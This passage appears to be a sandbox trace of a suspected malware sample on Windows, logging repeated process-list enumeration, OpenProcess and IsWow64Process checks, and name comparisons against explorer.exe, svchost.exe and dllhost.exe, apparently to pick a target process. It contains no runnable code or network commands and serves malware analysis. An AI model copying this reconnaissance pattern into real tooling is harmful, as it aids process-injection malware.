dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0223.031] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.031] CloseHandle (hObject=0xd8) returned 1 [0223.031] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.031] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0223.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0223.032] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0223.032] CloseHandle (hObject=0xd8) returned 1 [0223.032] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0223.032] CloseHandle (hObject=0xd4) returned 1 [0223.032] Sleep (dwMilliseconds=0x3e8) [0224.040] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0224.042] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0224.043] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0224.043] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0224.044] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0224.044] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0224.045] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0224.045] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0224.046] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0224.046] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0224.047] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0224.047] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0224.048] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0224.048] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0224.049] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0224.049] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0224.050] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0224.050] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0224.051] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0224.051] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0224.052] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.052] CloseHandle (hObject=0xd8) returned 1 [0224.052] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0224.052] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0224.052] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0224.052] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0224.053] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0224.053] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.053] CloseHandle (hObject=0xd8) returned 1 [0224.053] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0224.053] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0224.053] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0224.053] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0224.054] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0224.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0224.054] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0224.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0224.055] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.055] CloseHandle (hObject=0xd8) returned 1 [0224.055] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0224.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0224.055] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.055] CloseHandle (hObject=0xd8) returned 1 [0224.055] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0224.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0224.056] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.056] CloseHandle (hObject=0xd8) returned 1 [0224.056] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0224.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0224.057] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.057] CloseHandle (hObject=0xd8) returned 1 [0224.057] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0224.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0224.057] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.057] CloseHandle (hObject=0xd8) returned 1 [0224.057] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0224.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0224.058] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.058] CloseHandle (hObject=0xd8) returned 1 [0224.058] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0224.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0224.059] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.059] CloseHandle (hObject=0xd8) returned 1 [0224.059] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0224.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0224.059] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.059] CloseHandle (hObject=0xd8) returned 1 [0224.059] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0224.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0224.060] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.060] CloseHandle (hObject=0xd8) returned 1 [0224.060] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0224.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0224.060] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.060] CloseHandle (hObject=0xd8) returned 1 [0224.060] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0224.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0224.061] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.061] CloseHandle (hObject=0xd8) returned 1 [0224.061] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0224.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0224.061] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.062] CloseHandle (hObject=0xd8) returned 1 [0224.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0224.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0224.062] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.062] CloseHandle (hObject=0xd8) returned 1 [0224.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0224.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0224.063] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.063] CloseHandle (hObject=0xd8) returned 1 [0224.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0224.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0224.063] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.063] CloseHandle (hObject=0xd8) returned 1 [0224.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0224.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0224.064] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.064] CloseHandle (hObject=0xd8) returned 1 [0224.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0224.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0224.065] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.065] CloseHandle (hObject=0xd8) returned 1 [0224.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0224.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0224.065] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.065] CloseHandle (hObject=0xd8) returned 1 [0224.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0224.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0224.066] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.066] CloseHandle (hObject=0xd8) returned 1 [0224.066] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0224.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0224.066] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.066] CloseHandle (hObject=0xd8) returned 1 [0224.066] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0224.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0224.067] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0224.067] CloseHandle (hObject=0xd8) returned 1 [0224.067] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0224.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0224.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0224.069] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0224.069] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0224.070] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0224.070] IsWow64Process (in: hProcess=0xd8, 